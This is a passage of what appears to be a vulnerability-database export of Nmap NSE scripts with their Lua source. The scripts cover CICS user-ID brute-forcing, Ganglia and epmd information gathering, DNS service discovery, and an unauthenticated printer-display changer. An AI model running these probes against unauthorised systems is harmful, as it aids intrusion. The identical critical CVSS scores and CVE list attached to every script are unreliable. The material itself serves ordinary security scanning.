self.tn3270:get_screen():sub(2,80), creds.State.VALID)\n end\n\n return false, brute.Error:new(\"Something went wrong, we didn't get a proper response\")\n end\n}\n\n--- Tests the target to see if we can even get to CICS\n--\n-- @param host host NSE object\n-- @param port port NSE object\n-- @param commands optional script-args of commands to use to get to CICS\n-- @return status true on success, false on failure\n\nlocal function cics_test( host, port, commands, transaction )\n stdnse.verbose(2,\"Checking for CICS Login Page\")\n local tn = tn3270.Telnet:new()\n tn:disable_tn3270e()\n local status, err = tn:initiate(host,port)\n local cesl = false -- initially we're not at CICS\n if not status then\n stdnse.debug(\"Could not initiate TN3270: %s\", err )\n return false\n end\n tn:get_screen_debug(2) -- prints TN3270 screen to debug\n stdnse.debug(\"Getting to CICS\")\n local run = stringaux.strsplit(\";%s*\", commands)\n for i = 1, #run do\n stdnse.debug(1,\"Issuing Command (#%s of %s): %s\", i, #run ,run[i])\n tn:send_cursor(run[i])\n tn:get_all_data()\n tn:get_screen_debug(2)\n end\n tn:get_all_data()\n tn:get_screen_debug(2) -- for debug purposes\n -- We should now be at CICS. Check if we're already at the logon screen\n if tn:find('Type your userid and password') then\n stdnse.verbose(2,\"At CICS Login Transaction\")\n tn:disconnect()\n return true\n end\n -- Uh oh. We're not at the logon screen. Now we need to send:\n -- * F3 to exit the CICS program\n -- * CLEAR (a tn3270 command) to clear the screen.\n -- (you need to clear before sending a transaction ID)\n -- * a known default CICS transaction ID with predictable outcome\n -- (CESF with 'Sign-off is complete.' as the result)\n -- to confirm that we were in CICS. 
If so we return true\n -- otherwise we return false\n local count = 1\n while not tn:isClear() and count < 6 do\n -- some systems will just kick you off others are slow in responding\n -- this loop continues to try getting out of whatever transaction 5 times. If it can't\n -- then we probably weren't in CICS to begin with.\n stdnse.debug(2,\"Sending: F3\")\n tn:send_pf(3) -- send F3\n tn:get_all_data()\n stdnse.debug(2,\"Clearing the Screen\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n count = count + 1\n end\n if count == 5 then\n return false, 'Could not get to CICS after 5 attempts. Is this even CICS?'\n end\n stdnse.debug(2,\"Sending %s\", transaction)\n tn:send_cursor(transaction)\n tn:get_all_data()\n if tn:isClear() then\n tn:get_all_data(1000)\n end\n tn:get_screen_debug(2)\n\n if tn:find('SIGN ON TO CICS') or tn:find(\"Signon to CICS\") then\n stdnse.verbose(2,\"At CICS Login Transaction (%s)\", transaction)\n tn:disconnect()\n return true\n end\n tn:disconnect()\n return false, 'Could not get to '.. transaction ..' (CICS Logon Screen)'\nend\n\n-- Filter iterator for unpwdb\n-- IDs are limited to 8 alpha numeric and @, #, $ and can't start with a number\n-- pattern:\n-- ^%D = The first char must NOT be a digit\n-- [%w@#%$] = All letters including the special chars @, #, and $.\nlocal valid_name = function(x)\n return (string.len(x) <= 8 and string.match(x,\"^%D+[%w@#%$]\"))\nend\n\naction = function(host, port)\n local commands = stdnse.get_script_args(SCRIPT_NAME .. '.commands') or \"cics\"\n local transaction = stdnse.get_script_args(SCRIPT_NAME .. 
'.transaction') or \"CESL\"\n local cicstst, err = cics_test(host, port, commands, transaction)\n if cicstst then\n local options = { commands = commands, trn = transaction }\n stdnse.debug(\"Starting CICS User ID Enumeration\")\n local engine = brute.Engine:new(Driver, host, port, options)\n engine.options.script_name = SCRIPT_NAME\n engine:setPasswordIterator(unpwdb.filter_iterator(brute.usernames_iterator(),valid_name))\n engine.options.passonly = true\n engine.options:setTitle(\"CICS User ID\")\n local status, result = engine:start()\n return result\n else\n return err\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:08", "description": "Retrieves system information (OS version, available memory, etc.) from a listening Ganglia Monitoring Daemon or Ganglia Meta Daemon. \n\nGanglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. The information retrieved includes HDD size, available memory, OS version, architecture (and more) from each of the systems in each of the clusters in the grid. \n\nFor more information about Ganglia, see: \n\n * <http://ganglia.sourceforge.net/>\n * <http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Monitoring_Daemon_.28gmond.29>\n * <http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Meta_Daemon_.28gmetad.29>\n\n## Script Arguments \n\n#### ganglia-info.bytes \n\nSet the number of bytes to retrieve. The default value is 1000000. This should be enough for a grid of more than 100 hosts. About 5KB-10KB of data is returned for each host in the cluster.\n\n#### ganglia-info.timeout \n\nSet the timeout in seconds. The default value is 30.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script ganglia-info --script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p <port> <target>\n \n\n## Script Output \n \n \n 8649/tcp open unknown syn-ack\n | ganglia-info:\n | Ganglia Version: 3.1.7\n | Cluster 1:\n | Name: unspecified\n | Owner: unspecified\n | Host 1:\n | Name: sled9735.sd.dreamhost.com\n | IP: 10.208.42.221\n | load_one: 0.53\n | mem_total: 24685564KB\n | os_release: 3.1.9-vs2.3.2.5\n | proc_run: 0\n | load_five: 0.52\n | gexec: OFF\n | disk_free: 305.765GB\n | mem_cached: 18857264KB\n | pkts_in: 821.73packets/sec\n | bytes_in: 72686.10bytes/sec\n | bytes_out: 5612221.50bytes/sec\n | swap_total: 1998844KB\n | mem_free: 187964KB\n | load_fifteen: 0.57\n | os_name: Linux\n | boottime: 1429708366s\n | cpu_idle: 96.3%\n | cpu_user: 2.7%\n | cpu_nice: 0.0%\n | cpu_aidle: 94.7%\n | mem_buffers: 169588KB\n | cpu_system: 0.8%\n | part_max_used: 31.5%\n | disk_total: 435.962GB\n | mem_shared: 0KB\n | cpu_wio: 0.2%\n | machine_type: x86_64\n | proc_total: 1027\n | cpu_num: 8CPUs\n | cpu_speed: 2400MHz\n | pkts_out: 3977.13packets/sec\n | swap_free: 1393392KB\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [shortport](<../lib/shortport.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-10-04T05:45:54", "type": "nmap", "title": "ganglia-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-06-27T19:13:41", "id": "NMAP:GANGLIA-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/ganglia-info.html", "sourceData": "local comm = require \"comm\"\nlocal shortport = require \"shortport\"\nlocal slaxml = require \"slaxml\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves system information (OS version, available memory, etc.) from\na listening Ganglia Monitoring Daemon or Ganglia Meta Daemon.\n\nGanglia is a scalable distributed monitoring system for high-performance\ncomputing systems such as clusters and Grids. The information retrieved\nincludes HDD size, available memory, OS version, architecture (and more) from\neach of the systems in each of the clusters in the grid.\n\nFor more information about Ganglia, see:\n* http://ganglia.sourceforge.net/\n* http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Monitoring_Daemon_.28gmond.29\n* http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Meta_Daemon_.28gmetad.29\n]]\n\n---\n-- @usage\n-- nmap --script ganglia-info --script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p <port> <target>\n--\n-- @args ganglia-info.timeout\n-- Set the timeout in seconds. The default value is 30.\n-- @args ganglia-info.bytes\n-- Set the number of bytes to retrieve. 
The default value is 1000000.\n-- This should be enough for a grid of more than 100 hosts.\n-- About 5KB-10KB of data is returned for each host in the cluster.\n--\n-- @output\n-- 8649/tcp open unknown syn-ack\n-- | ganglia-info:\n-- | Ganglia Version: 3.1.7\n-- | Cluster 1:\n-- | Name: unspecified\n-- | Owner: unspecified\n-- | Host 1:\n-- | Name: sled9735.sd.dreamhost.com\n-- | IP: 10.208.42.221\n-- | load_one: 0.53\n-- | mem_total: 24685564KB\n-- | os_release: 3.1.9-vs2.3.2.5\n-- | proc_run: 0\n-- | load_five: 0.52\n-- | gexec: OFF\n-- | disk_free: 305.765GB\n-- | mem_cached: 18857264KB\n-- | pkts_in: 821.73packets/sec\n-- | bytes_in: 72686.10bytes/sec\n-- | bytes_out: 5612221.50bytes/sec\n-- | swap_total: 1998844KB\n-- | mem_free: 187964KB\n-- | load_fifteen: 0.57\n-- | os_name: Linux\n-- | boottime: 1429708366s\n-- | cpu_idle: 96.3%\n-- | cpu_user: 2.7%\n-- | cpu_nice: 0.0%\n-- | cpu_aidle: 94.7%\n-- | mem_buffers: 169588KB\n-- | cpu_system: 0.8%\n-- | part_max_used: 31.5%\n-- | disk_total: 435.962GB\n-- | mem_shared: 0KB\n-- | cpu_wio: 0.2%\n-- | machine_type: x86_64\n-- | proc_total: 1027\n-- | cpu_num: 8CPUs\n-- | cpu_speed: 2400MHz\n-- | pkts_out: 3977.13packets/sec\n-- | swap_free: 1393392KB\n--\n-- @xmloutput\n-- <elem key=\"Ganglia Version\">3.1.7</elem>\n-- <table key=\"Cluster 1\">\n-- <elem key=\"Name\">unspecified</elem>\n-- <elem key=\"Owner\">unspecified</elem>\n-- <table key=\"Host 1\">\n-- <elem key=\"Name\">sled9735.sd.dreamhost.com</elem>\n-- <elem key=\"IP\">10.208.42.221</elem>\n-- <elem key=\"load_one\">0.53</elem>\n-- <elem key=\"mem_total\">24685564KB</elem>\n-- <elem key=\"os_release\">3.1.9-vs2.3.2.5</elem>\n-- <elem key=\"proc_run\">0</elem>\n-- <elem key=\"load_five\">0.52</elem>\n-- <elem key=\"gexec\">OFF</elem>\n-- <elem key=\"disk_free\">305.765GB</elem>\n-- <elem key=\"mem_cached\">18857264KB</elem>\n-- <elem key=\"pkts_in\">821.73packets/sec</elem>\n-- <elem key=\"bytes_in\">72686.10bytes/sec</elem>\n-- <elem 
key=\"bytes_out\">5612221.50bytes/sec</elem>\n-- <elem key=\"swap_total\">1998844KB</elem>\n-- <elem key=\"mem_free\">187964KB</elem>\n-- <elem key=\"load_fifteen\">0.57</elem>\n-- <elem key=\"os_name\">Linux</elem>\n-- <elem key=\"boottime\">1429708366s</elem>\n-- <elem key=\"cpu_idle\">96.3%</elem>\n-- <elem key=\"cpu_user\">2.7%</elem>\n-- <elem key=\"cpu_nice\">0.0%</elem>\n-- <elem key=\"cpu_aidle\">94.7%</elem>\n-- <elem key=\"mem_buffers\">169588KB</elem>\n-- <elem key=\"cpu_system\">0.8%</elem>\n-- <elem key=\"part_max_used\">31.5%</elem>\n-- <elem key=\"disk_total\">435.962GB</elem>\n-- <elem key=\"mem_shared\">0KB</elem>\n-- <elem key=\"cpu_wio\">0.2%</elem>\n-- <elem key=\"machine_type\">x86_64</elem>\n-- <elem key=\"proc_total\">1027</elem>\n-- <elem key=\"cpu_num\">8CPUs</elem>\n-- <elem key=\"cpu_speed\">2400MHz</elem>\n-- <elem key=\"pkts_out\">3977.13packets/sec</elem>\n-- <elem key=\"swap_free\">1393392KB</elem>\n-- </table>\n-- </table>\n--\n-- Version 0.2\n-- Created 2011-06-28 - v0.1 - created by Brendan Coles - itsecuritysolutions.org\n-- Created 2015-07-30 - v0.2 - Added Support for SLAXML by Gyanendra Mishra\n\nauthor = {\"Brendan Coles\", \"Gyanendra Mishra\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service ({8649,8651}, \"ganglia\", {\"tcp\"})\n\nlocal function set_name_value(name)\n return function(value, state)\n state.result[name] = value\n end\nend\n\nlocal function set_cluster(name)\n return function(value, state)\n local current = state[#state]\n if not current.out then\n state.cc = state.cc + 1\n current.out = stdnse.output_table()\n current.hc = 0\n state.result[\"Cluster \" .. state.cc] = current.out\n end\n state.result[\"Cluster \" .. 
state.cc][name] = value\n end\nend\n\nlocal function get_current_cluster(state)\n for i=#state, 1, -1 do\n if state[i][1] == \"CLUSTER\" then\n return state[i]\n end\n end\nend\n\nlocal function set_host(name)\n return function(value, state)\n local current = state[#state]\n local current_cluster = get_current_cluster(state)\n if not current.out then\n current_cluster.hc = current_cluster.hc + 1\n current.out = stdnse.output_table()\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc] = current.out\n end\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc][name] = value\n end\nend\n\nlocal function set_metric(name)\n return function(value, state)\n local current = state[#state]\n local current_cluster = get_current_cluster(state)\n current[name] = value\n if current[\"name\"] and current[\"value\"] and current[\"unit\"] then\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc][current[\"name\"]] = current[\"value\"] .. current[\"unit\"]\n end\n end\nend\n\nlocal P = {\n GANGLIA_XML = {\n VERSION = set_name_value(\"Ganglia Version\"),\n },\n GRID = {\n NAME = set_name_value(\"Grid Name\"),\n },\n CLUSTER = {\n NAME = set_cluster(\"Name\"),\n OWNER = set_cluster(\"Owner\"),\n },\n HOST = {\n NAME = set_host(\"Name\"),\n IP = set_host(\"IP\"),\n },\n METRIC = {\n NAME = set_metric(\"name\"),\n UNITS = set_metric(\"unit\"),\n VAL = set_metric(\"value\"),\n }\n}\n\naction = function( host, port )\n\n local result = stdnse.output_table()\n\n -- Set timeout\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. '.timeout'))\n timeout = timeout or 30\n\n -- Set bytes\n local bytes = stdnse.get_script_args(SCRIPT_NAME .. 
'.bytes')\n bytes = tonumber(bytes) or 1000000\n\n -- Retrieve grid data in XML format over TCP\n stdnse.debug1(\"Connecting to %s:%s\", host.targetname or host.ip, port.number)\n local status, data = comm.get_banner(host, port, {request_timeout=timeout*1000,bytes=bytes})\n if not status then\n stdnse.debug1(\"Timeout exceeded for %s:%s (Timeout: %ss).\", host.targetname or host.ip, port.number, timeout)\n return\n end\n\n local state = {\n cc = 0,\n result=stdnse.output_table()\n }\n\n local parser = slaxml.parser:new()\n parser._call = {\n startElement = function(name) table.insert(state, {name}) end,\n closeElement = function(name) assert(state[#state][1] == name) state[#state] = nil end,\n attribute = function(name, value)\n local p_elem = P[state[#state][1]]\n if not (p_elem and p_elem[name]) then return end\n local p_attr = p_elem[name]\n if not p_attr then return end\n p_attr(value, state)\n end,\n }\n\n parser:parseSAX(data, {stripWhitespace=true})\n\n if #state.result then return state.result end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:32", "description": "Retrieves or sets the ready message on printers that support the Printer Job Language. This includes most PostScript printers that listen on port 9100\\. Without an argument, displays the current ready message. 
With the `pjl_ready_message` script argument, displays the old ready message and changes it to the message given.\n\n## Script Arguments \n\n#### pjl_ready_message \n\nReady message to display. The value is inserted verbatim between double quotes in an `@PJL RDYMSG DISPLAY` command, so it must not itself contain a double quote or a line break. The script sends this command over the raw jetdirect port without any authentication and the device's display is really changed (the script re-reads the status to confirm), which is why the script is in the intrusive category.\n\n## Example Usage \n \n \n nmap --script=pjl-ready-message.nse \\\n --script-args='pjl_ready_message=\"your message here\"'\n\n## Script Output \n \n \n 9100/tcp open jetdirect\n |_ pjl-ready-message: \"READY\" changed to \"p0wn3d pr1nt3r\"\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-07-16T22:46:45", "type": "nmap", "title": "pjl-ready-message NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-11-14T23:29:05", "id": "NMAP:PJL-READY-MESSAGE.NSE", "href": "https://nmap.org/nsedoc/scripts/pjl-ready-message.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nRetrieves or sets the ready message on printers that support the Printer\nJob Language. 
This includes most PostScript printers that listen on port\n9100. Without an argument, displays the current ready message. With the\n<code>pjl_ready_message</code> script argument, displays the old ready\nmessage and changes it to the message given.\n]]\n\n---\n-- @arg pjl_ready_message Ready message to display.\n-- @output\n-- 9100/tcp open jetdirect\n-- |_ pjl-ready-message: \"READY\" changed to \"p0wn3d pr1nt3r\"\n-- @usage\n-- nmap --script=pjl-ready-message.nse \\\n-- --script-args='pjl_ready_message=\"your message here\"'\n\nauthor = \"Aaron Leininger\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"intrusive\"}\n\nportrule = shortport.port_or_service(9100, \"jetdirect\")\n\nlocal function parse_response(response)\n local msg\n local line\n\n for line in response:gmatch(\".-\\n\") do\n msg = line:match(\"^DISPLAY=\\\"(.*)\\\"\")\n if msg then\n return msg\n end\n end\nend\n\naction = function(host, port)\n\n local status --to be used to grab the existing status of the display screen before changing it.\n local newstatus --used to repoll the printer after setting the display to check that the probe worked.\n local statusmsg --stores the PJL command to get the printer's status\n local response --stores the response sent over the network from the printer by the PJL status command\n\n statusmsg=\"@PJL INFO STATUS\\r\\n\"\n\n local rdymsg=\"\" --string containing text to send to the printer.\n local rdymsgarg=\"\" --will contain the argument from the command line if one exists\n\n local socket = nmap.new_socket()\n socket:set_timeout(15000)\n local try = nmap.new_try(function() socket:close() end)\n try(socket:connect(host, port))\n try(socket:send(statusmsg)) --this block gets the current display status\n local data\n response,data=socket:receive()\n if not response then --send an initial probe. 
If no response, send nothing further.\n socket:close()\n if nmap.verbosity() > 0 then\n return \"No response from printer: \"..data\n else\n return nil\n end\n end\n\n status = parse_response(data)\n if not status then\n if nmap.verbosity() > 0 then\n return \"Error reading printer response: \"..data\n else\n return nil\n end\n end\n\n rdymsgarg = nmap.registry.args.pjl_ready_message\n if not rdymsgarg then\n if status then\n return \"\\\"\"..status..\"\\\"\"\n else\n return nil\n end\n end\n\n rdymsg=\"@PJL RDYMSG DISPLAY = \\\"\"..rdymsgarg..\"\\\"\\r\\n\"\n try(socket:send(rdymsg)) --actually set the display message here.\n\n try(socket:send(statusmsg)) --this block gets the status again for comparison\n response,data=socket:receive()\n if not response then\n socket:close()\n return \"\\\"\"..status..\"\\\"\"\n end\n newstatus=parse_response(data)\n if not newstatus then\n socket:close()\n return \"\\\"\"..status..\"\\\"\"\n end\n\n socket:close()\n\n return \"\\\"\"..status..\"\\\" changed to \\\"\"..newstatus..\"\\\"\"\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:30", "description": "Connects to Erlang Port Mapper Daemon (epmd) and retrieves a list of nodes with their respective port numbers.\n\n## Example Usage \n \n \n nmap -p 4369 --script epmd-info <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 4369/tcp open epmd\n | epmd-info.nse:\n | epmd_port: 4369\n | nodes:\n | rabbit: 36804\n |_ ejabberd: 46540\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-04T18:28:33", "type": "nmap", "title": "epmd-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-25T13:29:52", "id": "NMAP:EPMD-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/epmd-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nConnects to Erlang Port Mapper Daemon (epmd) and retrieves a list of nodes with their respective port numbers.\n]]\n\n---\n-- @usage\n-- nmap -p 4369 --script epmd-info <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 4369/tcp open epmd\n-- | epmd-info.nse:\n-- | epmd_port: 4369\n-- | nodes:\n-- | rabbit: 36804\n-- |_ ejabberd: 46540\n-- @xmloutput\n-- <elem key=\"epmd_port\">4369</elem>\n-- <table key=\"nodes\">\n-- <elem key=\"rabbit\">36804</elem>\n-- <elem key=\"ejabberd\">46540</elem>\n-- </table>\n\nauthor = \"Toni Ruottu\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service (4369, \"epmd\")\n\naction = function(host, port)\n local socket = nmap.new_socket()\n socket:set_timeout(stdnse.get_timeout(host))\n local try = nmap.new_try(function () socket:close() end)\n try(socket:connect(host, port))\n\n 
try(socket:send(\"\\x00\\x01n\")) -- NAMESREQ = 110\n\n local getline = stdnse.make_buffer(socket, \"\\n\")\n\n local data, err = getline()\n if data == nil then\n stdnse.debug2(\"Error on receive: %s\", err)\n socket:close()\n return nil\n end\n\n local realport, pos = string.unpack(\">I4\", data)\n data = string.sub(data, pos)\n\n local nodes = stdnse.output_table()\n local name, port\n while data and data ~= \"\" do\n name, port = data:match(\"^name (.*) at port (%d+)\")\n if name then\n nodes[name] = port\n end\n data = getline()\n end\n\n local response = stdnse.output_table()\n response.epmd_port = realport\n response.nodes = nodes\n return response\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:44", "description": "Attempts to discover target hosts' services using the DNS Service Discovery protocol. \n\nThe script first sends a query for _services._dns-sd._udp.local to get a list of services. It then sends a followup query for each one to try to get more information.\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n#### dnssd.services \n\nSee the documentation for the [dnssd](<../lib/dnssd.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script=dns-service-discovery -p 5353 <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 5353/udp open zeroconf udp-response\n | dns-service-discovery:\n | 548/tcp afpovertcp\n | model=MacBook5,1\n | Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n | 3689/tcp daap\n | txtvers=1\n | iTSh Version=196609\n | MID=0xFB5338C04123456\n | Database ID=6FA9761FE123456\n | dmv=131078\n | Version=196616\n | OSsi=0x1F6\n | Machine Name=Patrik Karlsson\\xE2\\x80\\x99s Library\n | Media Kinds Shared=1\n | Machine ID=8945A7123456\n | Password=0\n |_ Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n\n## Requires \n\n * [dnssd](<../lib/dnssd.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-21T01:53:46", "type": "nmap", "title": "dns-service-discovery NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:DNS-SERVICE-DISCOVERY.NSE", "href": 
"https://nmap.org/nsedoc/scripts/dns-service-discovery.html", "sourceData": "local dnssd = require \"dnssd\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription=[[\nAttempts to discover target hosts' services using the DNS Service Discovery protocol.\n\nThe script first sends a query for _services._dns-sd._udp.local to get a\nlist of services. It then sends a followup query for each one to try to\nget more information.\n]]\n\n\n---\n-- @usage\n-- nmap --script=dns-service-discovery -p 5353 <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 5353/udp open zeroconf udp-response\n-- | dns-service-discovery:\n-- | 548/tcp afpovertcp\n-- | model=MacBook5,1\n-- | Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n-- | 3689/tcp daap\n-- | txtvers=1\n-- | iTSh Version=196609\n-- | MID=0xFB5338C04123456\n-- | Database ID=6FA9761FE123456\n-- | dmv=131078\n-- | Version=196616\n-- | OSsi=0x1F6\n-- | Machine Name=Patrik Karlsson\\xE2\\x80\\x99s Library\n-- | Media Kinds Shared=1\n-- | Machine ID=8945A7123456\n-- | Password=0\n-- |_ Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n\n\n-- Version 0.7\n-- Created 01/06/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 01/13/2010 - v0.2 - modified to use existing dns library instead of mdns, changed output to be less DNS like\n-- Revised 02/01/2010 - v0.3 - removed incorrect try/catch statements\n-- Revised 10/04/2010 - v0.4 - added prerule and add target support <patrik@cqure.net>\n-- Revised 10/05/2010 - v0.5 - added ip sort function and\n-- Revised 10/10/2010 - v0.6 - multicast queries are now used in parallel to collect service information <patrik@cqure.net>\n-- Revised 10/29/2010 - v0.7 - factored out most of the code to dnssd library\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\nportrule = 
shortport.portnumber(5353, \"udp\")\n\naction = function(host, port)\n local helper = dnssd.Helper:new( host, port )\n local status, result = helper:queryServices()\n\n if ( status ) then\n -- set port to open\n nmap.set_port_state(host, port, \"open\")\n return stdnse.format_output(true, result)\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:37:34", "description": "Extracts information from Quake game servers and other game servers which use the same protocol. \n\nQuake uses UDP packets, which because of source spoofing can be used to amplify a denial-of-service attack. For each request, the script reports the payload amplification as a ratio. The format used is `response_bytes/request_bytes=ratio`\n\n<http://www.gamers.org/dEngine/quake/QDP/qnp.html>\n\n## Example Usage \n \n \n nmap -n -sU -Pn --script quake1-info -pU:26000-26004 -- <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 26000/udp open quake\n | quake1-info:\n | server info exchange payload amplification: 59/12=4.916667\n | listen address: 10.200.200.10:26000\n | server name: An anonymous Debian server\n | level name: dm1\n | players: 1/8\n | player table\n | player 1: 